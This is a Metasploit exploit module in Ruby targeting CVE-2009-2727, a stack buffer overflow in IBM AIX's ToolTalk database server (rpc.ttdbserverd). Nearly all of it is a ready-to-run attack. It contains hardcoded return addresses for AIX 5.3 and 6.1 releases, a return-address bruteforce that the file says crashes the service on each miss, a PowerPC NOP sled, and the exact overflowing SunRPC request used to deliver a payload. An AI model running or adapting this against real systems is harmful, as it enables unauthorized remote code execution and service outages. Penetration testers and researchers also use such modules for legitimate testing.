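##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote stack buffer overflow in the ToolTalk database server
# (rpc.ttdbserverd, RPC program 100083) on IBM AIX — CVE-2009-2727.
#
# Operational notes for the operator:
# * The return address is bruteforced by Msf::Exploit::Brute in 1024-byte
#   steps around a per-release guess ('Ret' +/- 8192).  A miss overwrites
#   the return address with garbage, so each failed attempt is expected to
#   crash or hang rpc.ttdbserverd; treat the module as service-disrupting.
# * The AIX payloads are generated for a specific release, so the selected
#   target's 'AIX' string is copied into datastore['AIX'] before the payload
#   is generated (see #brute_exploit).
# * The two "Debug" targets send recognisable marker addresses
#   (0xaabbccdd / 0xddccbbaa) and are meant for crash triage, not for
#   gaining a session.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SunRPC
  include Msf::Exploit::Brute

  # SunRPC program number of rpc.ttdbserverd (ToolTalk database server).
  TTDBSERVERD_PROGRAM = 100083
  # RPC program version the request is sent against.
  TTDBSERVERD_VERSION = 1
  # RPC procedure the overflowing request is sent to.
  TTDBSERVERD_PROCEDURE = 15

  # PPC `or r31,r31,r31` (i.e. `mr r31,r31`), a no-op used as the sled in
  # front of the payload.
  PPC_NOP = "\x7f\xff\xfb\x78".b.freeze
  # Number of no-op instructions in the sled (as in the original exploit).
  NOP_COUNT = 1920
  # Repetitions of the target's 'Addr1' pointer (1022 + 8 in the original).
  ADDR1_COUNT = 1022 + 8
  # Repetitions of the candidate return address.
  RET_COUNT = 32

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',
      'Description'    => %q{
        This module exploits a buffer overflow vulnerability in _tt_internal_realpath
        function of the ToolTalk database server (rpc.ttdbserverd).
      },
      'Author'         =>
        [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
      'Platform'       => [ 'aix' ],
      'References'     =>
        [
          [ 'CVE', '2009-2727'],
          [ 'OSVDB', '55151' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      # Each target carries: the return-address guess ('Ret'), a second
      # address repeated ahead of it ('Addr1'), the release string handed to
      # the AIX payload generator ('AIX'), and the bruteforce window around
      # 'Ret'.  Keep the order: users select targets by index.
      'Targets'        =>
        [
          [
            'IBM AIX Version 6.1.4',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20099430+4096,
              'Addr1'    => 0x2ff1ff50-8192,
              'AIX'      => '6.1.4',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20099430-8192 },
                  'Stop'  => { 'Ret' => 0x20099430+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            'IBM AIX Version 6.1.3',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20099280+4096,
              'Addr1'    => 0x2ff1ffd0-8192,
              'AIX'      => '6.1.3',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20099280-8192 },
                  'Stop'  => { 'Ret' => 0x20099280+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            'IBM AIX Version 6.1.2',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20099280+4096,
              'Addr1'    => 0x2ff1ffd0-8192,
              'AIX'      => '6.1.2',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20099280-8192 },
                  'Stop'  => { 'Ret' => 0x20099280+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            'IBM AIX Version 6.1.1',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20099280+4096,
              'Addr1'    => 0x2ff1ffd0-8192,
              'AIX'      => '6.1.1',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20099280-8192 },
                  'Stop'  => { 'Ret' => 0x20099280+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            'IBM AIX Version 6.1.0',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20099280+4096,
              'Addr1'    => 0x2ff1ffd0-8192,
              'AIX'      => '6.1.0',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20099280-8192 },
                  'Stop'  => { 'Ret' => 0x20099280+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            # Generic 5.3 target: uses the 5.3.9 addresses and payload release.
            'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20096ba0+4096,
              'Addr1'    => 0x2ff1ff14-8192,
              'AIX'      => '5.3.9',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20096ba0-8192 },
                  'Stop'  => { 'Ret' => 0x20096ba0+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            'IBM AIX Version 5.3.10',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20096bf0+4096,
              'Addr1'    => 0x2ff1ff14-8192,
              'AIX'      => '5.3.10',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20096bf0-8192 },
                  'Stop'  => { 'Ret' => 0x20096bf0+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            'IBM AIX Version 5.3.9',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20096ba0+4096,
              'Addr1'    => 0x2ff1ff14-8192,
              'AIX'      => '5.3.9',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20096ba0-8192 },
                  'Stop'  => { 'Ret' => 0x20096ba0+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            'IBM AIX Version 5.3.8',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20096c10+4096,
              'Addr1'    => 0x2ff1ff98-8192,
              'AIX'      => '5.3.8',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20096c10-8192 },
                  'Stop'  => { 'Ret' => 0x20096c10+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            'IBM AIX Version 5.3.7',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0x20096c10+4096,
              'Addr1'    => 0x2ff1ff98-8192,
              'AIX'      => '5.3.7',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x20096c10-8192 },
                  'Stop'  => { 'Ret' => 0x20096c10+8192 },
                  'Step'  => 1024
                }
            }
          ],
          [
            # Crash-triage target: marker addresses, single bruteforce step.
            'Debug IBM AIX Version 6.1',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0xaabbccdd,
              'Addr1'    => 0xddccbbaa,
              'AIX'      => '6.1.4',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xaabbccdd },
                  'Stop'  => { 'Ret' => 0xaabbccdd },
                  'Step'  => 1024
                }
            }
          ],
          [
            # Crash-triage target: marker addresses, single bruteforce step.
            'Debug IBM AIX Version 5.3',
            {
              'Arch'     => 'ppc',
              'Platform' => 'aix',
              'Ret'      => 0xaabbccdd,
              'Addr1'    => 0xddccbbaa,
              'AIX'      => '5.3.10',
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xaabbccdd },
                  'Stop'  => { 'Ret' => 0xaabbccdd },
                  'Step'  => 1024
                }
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2009-06-17',
      # A wrong return address corrupts the daemon's stack; the bruteforce
      # therefore knocks the service over on every miss.
      'Notes'          =>
        {
          'Stability' => [CRASH_SERVICE_DOWN]
        }
    ))
  end

  # One bruteforce attempt, invoked by Msf::Exploit::Brute for every
  # candidate return address between 'Start' and 'Stop'.
  #
  # The payload is generated once (first call) and reused for every step;
  # datastore['AIX'] is set from the target beforehand because the AIX
  # payload generation depends on it.
  #
  # @param brute_target [Hash] the current step; only 'Ret' is read
  # @return [void]
  def brute_exploit(brute_target)
    ret = brute_target['Ret']

    unless @aixpayload
      datastore['AIX'] = target['AIX']
      @aixpayload = regenerate_payload.encoded
    end

    print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % ret)

    begin
      sunrpc_create('tcp', TTDBSERVERD_PROGRAM, TTDBSERVERD_VERSION)

      print_status('Sending procedure 15 call message...')
      sunrpc_call(TTDBSERVERD_PROCEDURE, build_request(ret))

      sunrpc_destroy
      handler
    rescue Rex::Proto::SunRPC::RPCTimeout
      # The usual outcome of a miss: the daemon died or hung and never
      # answered.  Report at verbose level and let the bruteforce move on,
      # but do not leave the RPC connection dangling across hundreds of steps.
      vprint_status("No RPC reply for 0x%08x (timeout)" % ret)
      release_rpc
    rescue EOFError
      # The target closed the connection before replying (e.g. the daemon
      # crashed mid-request).  Same handling as a timeout.
      vprint_status("Connection closed by the target for 0x%08x" % ret)
      release_rpc
    end
  end

  private

  # Builds the XDR-encoded procedure-15 request body for one candidate
  # return address.  The layout is the original author's:
  #
  #   lead filler | 'Addr1' x 1030 | ret x 32 | trail filler | NOP x 1920 | payload
  #
  # followed by four XDR integers (2, 0x78000000, 2, 0x78000000) that
  # complete the call arguments as the original exploit sends them.  The
  # filler is 1 + 3 bytes on AIX 6.x and 2 + 2 bytes otherwise — presumably
  # alignment of the pointer block for the two builds; kept as-is.
  #
  # @param ret [Integer] candidate return address
  # @return [String] encoded request body
  def build_request(ret)
    aix6 = target['AIX'].to_s.match?(/6\./)
    lead, trail = aix6 ? ['A', 'AAA'] : ['AA', 'AA']

    buf = ''.b
    buf << lead
    buf << [target['Addr1']].pack('N') * ADDR1_COUNT
    buf << [ret].pack('N') * RET_COUNT
    buf << trail
    buf << PPC_NOP * NOP_COUNT
    buf << @aixpayload

    Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
  end

  # Best-effort release of the RPC connection after a failed attempt.
  # Errors are logged instead of raised so they cannot mask the failure
  # being handled (e.g. when sunrpc_create itself was what failed).
  def release_rpc
    sunrpc_destroy
  rescue StandardError => e
    vprint_error("Failed to release the RPC connection: #{e.class}: #{e.message}")
  end
end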